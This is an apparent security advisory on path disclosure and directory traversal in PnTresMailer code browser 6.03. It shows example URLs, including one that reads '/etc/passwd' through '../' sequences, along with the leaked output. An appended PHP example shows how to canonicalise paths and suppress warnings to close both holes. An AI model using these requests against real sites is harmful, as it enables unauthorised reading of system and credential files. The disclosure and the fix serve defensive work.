PnTresMailer code browser version 6.03 is susceptible to path disclosure and directory traversal attacks.
Hello All,
PnTresMailer code browser 6.03 is open to information disclosure.
Authors Site: http://canvas.anubix.net
+-[Examples:]-----+
[1]
www.victimsite.com/codebrowserpntm.php?foldertohighlight=pnTresMailer&filetohighlight=w00t
Warning: highlight_file(codebrowserPnTM/pnTresMailer/w00t): failed to open stream: No such file or directory in /var/www/html/codebrowserpntm.php on line 130
Warning: highlight_file(): Failed opening 'codebrowserPnTM/pnTresMailer/w00t' for highlighting in /var/www/html/codebrowserpntm.php on line 130
[2]
www.victimsite.com/codebrowserpntm.php?downloadfolder=pnTresMailer&filetodownload=../../../../etc/passwd
Look what I've got...
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
+-[Notes:]-------+
Author is yet to be informed, will do so tonight.
Regards
John C
JohnC@NoBytes.com
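
Added example, not PnTresMailer's code and not from the advisory's author: one way a PHP file browser can close both issues above, by canonicalising the requested path and checking it stays under the served directory, and by keeping PHP warnings out of the response. The function name resolve_inside() and the temporary sandbox directory are hypothetical; only the folder and parameter patterns come from the advisory.

```php
<?php
// Added example, not PnTresMailer code. Function and sandbox names are hypothetical.
ini_set('display_errors', '0');   // path disclosure: keep PHP warnings out of responses
ini_set('log_errors', '1');       // still record them server-side

/**
 * Resolve a user-supplied folder/file pair to a real path inside $baseDir.
 * Returns the canonical path, or null if the target is missing or escapes the base.
 */
function resolve_inside(string $baseDir, string $folder, string $file): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Reject NUL bytes before touching the filesystem.
    if (strpos($folder . $file, "\0") !== false) {
        return null;
    }
    // realpath() canonicalises "..", "." and symlinks; false means "does not exist".
    $real = realpath($base . DIRECTORY_SEPARATOR . $folder . DIRECTORY_SEPARATOR . $file);
    if ($real === false || !is_file($real)) {
        return null;              // missing target: no warning raised, no path echoed
    }
    // Containment check on the canonical path, with a trailing separator so
    // "/base-other" does not pass as being inside "/base".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed sandbox so the example runs offline.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cb_demo_' . getmypid();
mkdir($root . '/codebrowserPnTM/pnTresMailer', 0700, true);
file_put_contents($root . '/codebrowserPnTM/pnTresMailer/index.php', "<?php // sample\n");
file_put_contents($root . '/outside.txt', "not for download\n");

$cases = [
    ['pnTresMailer', 'index.php'],          // legitimate request
    ['pnTresMailer', 'w00t'],               // missing file, as in example [1]
    ['pnTresMailer', '../../outside.txt'],  // traversal pattern, as in example [2]
];
foreach ($cases as [$folder, $file]) {
    $path = resolve_inside($root . '/codebrowserPnTM', $folder, $file);
    echo $folder . '/' . $file . ' => ' . ($path === null ? 'rejected (generic 404)' : 'served') . "\n";
}
```

Only the first case is served; the missing file and the traversal request both get the same generic rejection, so the response reveals neither the install path nor whether a file outside the browser directory exists.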